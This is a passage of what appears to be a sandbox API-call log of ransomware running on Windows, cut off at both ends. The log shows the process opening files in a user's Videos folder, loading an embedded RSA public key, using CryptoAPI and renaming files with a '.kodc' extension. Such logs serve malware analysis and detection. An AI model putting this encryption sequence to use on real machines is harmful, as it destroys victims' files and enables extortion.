Flags=0x0, Size=0x24) returned 0x334ce70 [0100.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.475] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0100.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d10 | out: hHeap=0x630000) returned 1 [0100.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d28 | out: hHeap=0x630000) returned 1 [0100.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0100.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7d28 [0100.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0100.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7d10 [0100.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0100.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0100.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0100.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d28 | out: hHeap=0x630000) returned 1 [0100.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d10 | out: hHeap=0x630000) returned 1 [0100.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0100.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.476] GetCurrentThreadId () returned 0x42c [0100.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba6e38 [0100.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0100.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.477] GetCurrentThreadId () returned 0x42c [0100.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0100.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d10 [0100.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0100.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d28 [0100.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7cf8 [0100.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7d40 [0100.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a10 [0100.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0100.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d10 | out: hHeap=0x630000) returned 1 [0100.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d10 [0100.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.480] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0100.480] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.480] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0100.480] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.480] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0100.480] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0100.480] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c540 [0100.480] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.480] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0100.480] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d10 | out: hHeap=0x630000) returned 1 [0100.480] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0100.480] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.480] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.480] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.480] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0100.480] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0100.480] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0100.480] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0100.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0100.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d40 | out: hHeap=0x630000) returned 1 [0100.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d28 | out: hHeap=0x630000) returned 1 [0100.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7cf8 | out: hHeap=0x630000) returned 1 [0100.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0100.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0100.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0100.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ce0 | out: hHeap=0x630000) returned 1 [0100.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c778 | out: hHeap=0x630000) returned 1 [0100.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0100.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0100.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0100.482] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.482] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.482] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.482] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.482] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.482] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0100.482] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba8d90*, nNumberOfBytesToWrite=0x7931, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba8d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x7931, lpOverlapped=0x0) returned 1 [0100.482] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba8d90 | out: hHeap=0x630000) returned 1 [0100.482] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x7936, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.482] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.482] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0100.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0100.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0100.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0100.483] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.483] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0100.483] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0100.483] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.483] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.483] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.483] CloseHandle (hObject=0x5cc) returned 1 [0100.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0100.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0100.486] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0100.486] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sqUbnXT-jNRb5-frgY.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\squbnxt-jnrb5-frgy.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sqUbnXT-jNRb5-frgY.avi.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\squbnxt-jnrb5-frgy.avi.kodc")) returned 1 [0100.486] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0100.487] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.487] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.488] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0100.488] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc98fd30, ftCreationTime.dwHighDateTime=0x1d5bf19, ftLastAccessTime.dwLowDateTime=0x2ea44c00, ftLastAccessTime.dwHighDateTime=0x1d5baf9, ftLastWriteTime.dwLowDateTime=0x2ea44c00, ftLastWriteTime.dwHighDateTime=0x1d5baf9, nFileSizeHigh=0x0, nFileSizeLow=0x11b2c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="T37HFV.flv", cAlternateFileName="")) returned 1 [0100.488] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0100.488] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0100.488] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.488] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\T37HFV.flv") returned=".flv" [0100.488] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\T37HFV.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\t37hfv.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.489] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=72492) returned 1 [0100.489] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.492] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x11b06, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.492] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.493] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.494] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x11b2c, lpOverlapped=0x0) returned 1 [0100.494] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.494] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.494] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.494] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0100.495] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.495] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.495] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.495] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.496] GetLastError () returned 0x0 [0100.496] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.496] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0100.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.496] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.496] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.496] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11b30) returned 0x9bb8968 [0100.497] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.497] RtlAllocateHeap 